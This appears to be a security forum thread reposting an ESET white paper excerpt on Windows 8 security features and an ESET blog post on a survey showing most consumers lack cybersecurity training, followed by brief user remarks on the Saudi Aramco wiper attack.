    Social engineering: a hidden flaw?
    Sensory (mis)perception
    Developers: the new targets of opportunity?
    Summing it all up/Windows 8 by the numbers
    Author bio
    About ESET

    Introduction

    In September of 2011, Microsoft released the first public preview of Windows 8, the next generation of their flagship desktop operating system, at the BUILD Developer Conference [1, 2]. Despite a flurry of pre-Microsoft leaks, interest in Windows 8 remained high, and the official release of the Windows 8 Developer Preview received a groundswell of attention in blogs, articles and elsewhere. A subsequent release, titled Consumer Preview, was released at the end of February 2012. While it contained some GUI changes, such as removal of the Start button from the taskbar, most of the changes to it were internal. Three months later, at the end of May, the Release Preview of Microsoft Windows 8 was released, with the user interface, feature set and APIs being close to (if not already) final.

    Much of the interest in Windows 8 focuses on cosmetic changes, such as the new modern Windows 8 interface (formerly known as the Metro user interface) and replacement of the Start Menu with the Start Screen, but substantial improvements have been made to Windows security, as well. In this white paper, we will look at some of these changes, and what they mean to Windows 8's users.

    Defender of the faith

    One of the most widely discussed features of Windows 8 is the inclusion of Windows Defender with the new operating system. While this is not a new tool—Windows Defender has been included with all versions of Windows since Vista was released in 2005—previous versions of Windows Defender were limited to protecting users against spyware. The version of Windows Defender included with Windows 8 is actually a rebadged version of Microsoft Security Essentials, which has led at least one prominent journalist to predict the end of antivirus software, or at least those from third parties [3]. If that refrain sounds familiar, it may be because you have heard it before: similar predictions were bandied about when it was announced that Windows Vista would include Windows Defender [4, 5, 6] and a raft of new security features, such as User Account Control [7], a Microsoft implementation of a least-privilege model for users.

    Windows Defender as included with Windows 8 is a good product and does, in fact, provide a decent level of protection, especially when compared against other free anti-malware programs. However, Windows Defender does not contain many of the advanced features and functions of paid-for solutions, such as a high level of granularity for threat detection, task scheduling, centralized management and reporting and so forth. As with other free anti-malware programs, support options for Windows Defender are limited.

    Many new computers purchased with Windows 8, however, will not have Windows Defender installed as their default antimalware program. Many computer manufacturers ship their computers with a trial version of a commercial anti-malware program installed on them. This is because those manufacturers receive payments from the anti-malware vendors to preload the software onto the computers they sell [8]. Computer manufacturers also receive a royalty when the computer user purchases a license for the trial product, and when the license is renewed. While the amount of revenue this generates from each individual is not huge—perhaps $15-to-30 USD—when multiplied over tens or hundreds of thousands of computers, it becomes millions of dollars in revenue that computer manufacturers get from anti-malware companies. Microsoft has made it easy for computer manufacturers to disable Windows Defender so that they may continue to receive payments from antimalware vendors in exchange for bundling their anti-malware software [9, 10, 11].

    Download: http://go.eset.com/us/resources/white-papers/ESETNA_WP-Windows8-FUD.pdf
  21. Study finds 90 percent have no recent cybersecurity training

    Come to Defcamp: https://rstcenter.com/forum/60027-defcamp-2012-bucuresti-30-noiembrie-2-decembrie.rst

    by Stephen Cobb, ESET Security Evangelist

    A new study finds that only 1 in 10 consumers have had any classes or training about protecting their computer and/or their personal information during the last 12 months. Indeed, a shocking 68 percent say they have never had any such training, ever. These and other findings, first revealed by ESET at the Virus Bulletin conference in Dallas, come just in time for National Cyber Security Awareness Month.

    In our ongoing efforts to better understand the information security challenges that we, as a society, now face, ESET asked a cross-section of computer users several security-related questions. The most worrying findings? Only 1 in 10 people who regularly use a computer or other digital device to connect to the Internet have received any kind of cyber security training in the last 12 months, and more than two thirds have never had any such training.

    That 68/32 split you see in the pie chart rang a bell with us because it mirrored a different ESET poll, conducted by Harris earlier this year. The purpose of that poll was to study implications of the bring-your-own-device or BYOD trend. We asked employed U.S. adults if they had received any kind of computer security training from their employer and only 32 percent said they had. Another 64 percent said they had not and 4 percent said they couldn't recall having such training, which probably means it was not worth remembering. Clearly, with two separate surveys indicating that under a third of Internet users have had security training, we could be doing a much better job of educating employees and consumers about cybersecurity.

    More cyber-security training needed, and needed now

    While the total number of people in our latest survey who received no training was disappointing, things appear even worse when you take a closer look. Most of those who got training received it more than 12 months ago. Given the rate at which new threats emerge, and new defensive behaviors are needed, finding that only 10% had received any security training in the last 12 months was very disappointing. Here is the full breakdown of responses to the question: "Have you ever had any classes or training about protecting your computer and/or your personal information?"

    No training ever: 68%
    Yes, in last 12 months: 10%
    Yes, 1-2 years ago: 5%
    Yes, 3-5 years ago: 5.5%
    More than 5 years ago: 11.5%

    Frankly, I find these numbers alarming in their implications for cybersecurity, the protection of the data streams that have become the lifeblood of our digital economy and our nation's critical infrastructure. These findings also cast doubt on the perennial assertion by some experts that security problems mainly arise from the stupidity of users. In light of these survey results it is worth asking whether the stupidity lies more with those who expect to achieve system security without providing any education on the subject to the people who use the systems.

    During the evolution of computer security over the last 20 years there has been a persistent hope that security was a problem that could be solved technologically, therefore saving us the trouble of educating computer users about security. Clearly, that has not happened and, ironically, the improvements made in security technology have actually shifted the point of attack to users. Consider two current trends:

    1. 64-bit malware: As my colleague Aleksandr Matrosov pointed out in his analysis of the Rovnix bootkit framework, the task of writing malicious code that can successfully exploit 64-bit systems is getting harder. At the same time, marketing projections tell us that more and more systems will be 64-bit, a growing obstacle for cyber-criminals.
    2. Gateways to control applications: Both Apple and Microsoft are looking to restrict the installation of applications by end users in order to control the quality, and legitimacy, of application code. Users will need additional persuading (or social engineering) in order for malware to circumvent these controls.

    The implications of these two trends? People who seek to profit from unauthorized access to our data and systems will be forced, increasingly, to try to exploit human vulnerability. Tricking users into compromising their systems (and other systems to which they then connect) will be increasingly important as an attack vector. And that means the case for arming all computer-using humans with security training is stronger than ever. Sadly, these survey results suggest there is a ton of work to do before we can hope to achieve that goal.

    In the next installment of statistics from our recent survey we will explore consumer knowledge of cybersecurity in the absence of widespread training and look at some of the educational initiatives ESET is working on. In the meantime, please explore all that is going on in October for National Cyber Security Awareness Month. For example, you might want to point friends and family to the cybersecurity training modules that ESET has made available free of charge to Internet users in North America for the month of October.

    Source: Study finds 90 percent have no recent cybersecurity training | ESET ThreatBlog
  22. "Finally, the virus will overwrite the master boot record of the system to prevent it from booting." I don't think they were Romanians; ours only know ./scan or copy/paste ?id=123 into Havij and press a button. "A group named "Cutting Sword of Justice" claimed responsibility for an attack on 30,000 Saudi Aramco workstations" Does that sound like a Romanian group? Not to me. And I think it's bad, since we end up looking like the suckers...
  23. Great, lots of "good" guys over there.